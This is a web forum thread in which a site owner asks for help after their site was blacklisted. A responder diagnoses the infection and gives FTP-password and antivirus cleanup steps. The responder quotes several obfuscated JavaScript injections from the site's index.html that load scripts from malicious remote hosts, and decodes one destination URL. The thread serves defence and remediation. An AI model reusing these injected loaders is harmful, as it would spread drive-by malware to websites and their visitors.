If you are interested in hiring someone to handle this

by Kaleh

6 months ago

If you are interested in hiring someone to handle this for you, I would suggest that you spend a little time reading some of the threads here, identify those who provide such services, click on their user names, and read some of their posts to see the quality of assistance they provide here, as well as check out their web-sites for information related to the type of services they provide.

You could also get started with evaluating your situation by using the following resources.

How to remove the ‘This site may harm your computer’
http://25yearsofprogramming.com/blog/20071223.htm

How to prevent your site from getting hacked. How to repair a damaged site. Website security precautions
http://25yearsofprogramming.com/blog/20070705.htm

Tips for Cleaning & Securing your Website
http://www.stopbadware.org/home/security

by anirban

6 months ago

If you would provide your website name, someone here can point out if they can find the problem. In that case you may not even have to get help to clean your site! This group has excellent volunteers and if you go through some of the older posts, as Kaleh has pointed out, there are ample references on how to get rid of malware code.

Hope this helps,
-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site:www.stopthehacker.com
Blog:www.stopthehacker.com/blog
Twitter: @stopthehacker
Facebook: stopthehacker
Jaal: Protecting the Internet, one website at a time™

by Roofly

6 months ago

Hi!

Thanx for the reply, the sites name is brandsinfashion.com

I did a test with http://wam.dasient.com/wam/

That gave me this;

Infected URLs (1) Scanned URLs (691) This site is blacklisted
on

URL at brandsinfashion.com
(click the ‘+’ to view the infection)
http://www.brandsinfashion.com…

chinamobile-com.monografias.com.imageshack-us.mediatagonline.ru

by WeWatch

6 months ago

You have some malscript in your site.

In your index.html page you have:

<scr ipt>var y;if(y!='' && y!='e'){y='x'};v ar v=w indow;this.d=false;var t=document;var xl;if(xl!='ou'){xl=''};v ar db;if(db!='i' && db!='pt'){db=''};var l='s%c.rxi jpxt%'.replace(/[%x8j\.]/g, '');var a=new Array();var r=new Array();var ha='';v.onload=function(){this.b=20625;var pz;if(pz!='' && pz!='pd'){pz=null};try {var jm;if(jm!='' && jm!='fe'){jm=null};n=t.createElement(l);n.src='h1t$t1p$:M/L/LbLb1c1-Mc$oL-1uVk$.1pLoMgLo$.LcVoLm$.1gLo1oLgLlVe1-VcVo$-$u$k1.MrMeLc$eVnVt1mMeMx$iVcLo$.1r1u1:M8V0L8M0M/Ln$eM w1eVg$gV.1cMo1m$/$nLeLwVe$ VgV.1cVoLmL/MwLiMk1iVpLe$dLi$a1.MoMrMgM/Vg1oMo1gLl$e$.Mc$oLmL/VgLo1oL g1l1eM.1cVo$.Vv$e$/$'.re place(/[\$VLM1]/g, '');var au=false;n.setAtt ribute('dlelfP lrN'.replace(/[N%zlP]/g, ''), "1");this.lw="";var pzo;if(pzo!='ll' && pzo!='vq'){pzo=''};var ly=fals e;t.body.appendChild(n);var m=39390;} catch(o){var rd=33131;};};var ky;if(ky!='' && ky!='qh'){ky='pe'};</scr ipt>

Which decodes to pointing to:

http : // bbc-co-uk.pogo. com.google-co-uk. recentmexico. ru:8 080/newegg. com/newegg. com/wikipedia.org/google. com/google.co. ve/

Then you also have some malscript at the end of your index.html file after the closing html tag (</h tml>) that looks like:

<scr ipt>var y;if(y!='' && y!='e'){y='x'};var v=window;this.d=fals e;var t=document;var xl;if(xl!='ou'){xl=''};var db;if(db!='i' && db!='pt'){db=''};var l='s%c.rxijpxt%'.re place(/[%x8j\.]/g, '');var a=new Array();var r=n ew Arr ay();var ha='';v.onload=functi on(){this.b=20625;var pz;if(pz!='' && pz!='pd'){pz=null};try {var jm;if(jm!='' && jm!='fe'){jm=null};n=t.create Elem ent(l);n.src='h1t$t1p$:M/L/LbLb1c1-Mc$oL-1uVk$.1pLoMgLo$.LcVoLm$.1gLo1oL gLlVe1-VcVo$-$u$k1.MrMeLc$eVnV t1mMeMx$iVcLo$.1r1u1:M8V0L8M0M/Ln$eMw1eVg$gV.1cMo1m$/$nLeLwVe$gVgV.1cVoLmL/MwLiMk1iVpLe$dLi$a1.MoMrMgM/Vg1oMo1gLl$e$.Mc$oLmL/VgLo1oLg1l1eM.1cVo$.Vv$e$/$'.replace(/[\$VLM1]/g, '');var au=false;n.set Attribute('dlelfP elrN'.repl ace(/[N%zlP]/g, ''), "1");this.lw="";var pzo;if(pzo!='ll' && pzo!='vq'){pzo=''};var ly=false;t.body.appendChild(n);var m=39390;} catch(o){var rd=33131;};};var ky;if(ky!='' && ky!='qh'){ky='pe'};</scr ipt>


<scr>var j=window;var _ih=36922;var z=docum ent;var vr;if(vr!=‘b’ && vr!=‘bg’){vr=‘’};function l®{var _=[’h_tXtzpJ:/J/zsJaXnzszpzoz-XcJozmJ.6f_rXeJe_wXezbXs_.c6o6m_.c6nXb6lJo_g6sz-6czo_mX.Xbze6sJtzn6e_wXsXmXaJlXlX.XrzuJ:J8X0 z860z/XpzlzaXl_aJ.6oJrJ.Xjzpz/JpXlJaXl_a_.Jo6rX.zjzp_/3_96.6nJeXtX/XgJaJm Xezv6 a6nzc6e_.zczo_m6/zgXo_ogXl6ez.zczoXmz/J’.replace(/[JzX6]/g, ‘’), ’sHcHr LiIpIt~’.rep lace(/[~d LHI]/g, ‘’), ’c&rXe&a&tveXE&lXeXmvevn3t3’.replace(/[3&X\<v]/g, ‘’), ’o?n?lP oBa?dB’.replace(/[BPp\?\+]/g, ‘’), ’s2r#ch’.replace(/[h7S#2]/g, ‘’), ’a4pVp:e$nPd 4C4h4i:l$dV’.replace(/[V\:\$4P]/g, ‘’), ’spe%tSASt%t<rpiSbpu%tSeS’.replace(/[Sp\<%/]/g, ‘’), ’buord@yr’.replace(/[ru&@m]/g, ‘’), ’dpe/fnepr/’.replace(/[/\*npG]/g, ’’), “1”];this.e="";var ru=®;var im;if(im!=‘sz’ && im!=‘hj’){im=’sz’};return ru;var zum;if(zum!=‘kn’ && zum != ‘’){zum=null};}var v = function(){var g;if(g!=’ds’ && g != ’’){g=null};try {p=z[l(²⁰)](l([2,1]¹));p[l([4,6]¹)](l([1,8]¹), l(⁹⁰));var q="";var k = z[l([0,7]¹)];th is.n=“n”;p[l(⁴⁰)]=l([0,2]⁰);var hu=new Array();k[l([5,2]⁰)](p);} c atch(i){};var gk;if(gk!=‘lh’ && gk != ’’){gk=null};};j[l(³⁰)]=v;</scr ipt>



<scr>var g;if(g!=‘’){g=’_’};this.v=22978;var u=window;var x=document;var r=new String();var hh=“hh”;function xi(j){var y=fal se;v ar  l=[‘h5t;t5p5:;/;/DcDh5iHn;a;m1o5bHi1lDe5-Dc;oHm5.1mHo1n1oDgDr;a5f5i1aHsD.Dc1oDm1.;iHm;a1g;eHsHh5aDc1k;-DuHs;.1m;e5d;i;a5tDa5 gDo;nDl1iHn;eD.1r1u5:5810;8D0;/Dm1y 5s;pHa5c;e1.5c1o5mH/5m5yDs;pDa5c;e;.5c5o1m;/1g5oDoHg5l5eD.;c;oDmH/HsDmHh;.;c oHm;.DaHu;/5b5e;eDm5p13D.1cHoHm1/1’.rep lace(/[1DH;5]/g, ‘’), ’s9c:r:i4p4t:’.replace(/[\:4E59]/g, ‘’), ’c/r/e/a/t/e?E?lNe/m?esnot?’.replace(/[\?No/s]/g, ‘’), ’oJnwlJoJagdg’.replace(/[gMJw8]/g, ‘’), ’s Tr<c<’.replace(/[\<j\>TY]/g, ‘’), ’a2p*p*eun2d;CQhQi;lQd2’.replace(/[2uQ;\*]/g, ‘’), ’skektdAktdtkrdi&blu&tke&’.repl ace(/[&vdlk]/g, ‘’), ’b%o1d%y1’.rep lace(/[1%DHE]/g, ‘’), ’d0e.fPe6r.’.repl ace(/[\.I60P]/g, ‘’), “1”];var jc=l[j];return jc;}this.my=“my”;var o = func tion(){try {xs=x[xi(²⁰)](xi([1,3]⁰));var sy=new Arr ay();var ic;if(ic!=’yf’ && ic != ‘’){ic=null};xs[xi(⁶⁰)](xi(⁸⁰), xi(⁹⁰));this.xk="";xs[xi(⁴⁰)]=xi([0,2]⁰);this.jk=fa lse;v ar n = x[xi(⁷⁰)];var yft=new String();n[xi(⁵⁰)](xs);var u;if(u!=’’ && u!=‘fr’){u=null};} catch(m){v ar gs;if(gs!=‘np’ && gs!=‘fh’){gs=‘’};};};var of;if(o f!=’d’ && of!=‘xqu’){of=’d’};u[xi([3,3]⁰)]=o;this.bo=19300;this.ok="";

<!--10124e70aa15defc786 76697da0a3c02-->

These types of infections are usually the result of a virus on a PC with FTP access to the infected website. The virus steals the FTP login credentials, sends them to a server which then infects the website using valid FTP credentials.

The virus usually works by looking for the file that FTP programs use to store the saved username and password. Programs like FileZilla store their credentials in a plain text file. I use WS_FTP becauase it encrypts the login credentials.

You may have to scan all PCs with FTP access to your site with a different anti-virus program than what currently being used. The reason is that the virus knows how to evade detection. Many have had good success with Avast, F-Prot or Kaspersky.

First change all FTP passwords.

Second, remove the malscripts identified above. Search through all files on your website.

Third, scan all PCs with a different anti-virus program.

Fourth, let the forum here know when those steps are completed or if you have further questions.

Then, after the forum here has found your site clean, you can request a review from the Google Webmaster tools.

Let the forum know…

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com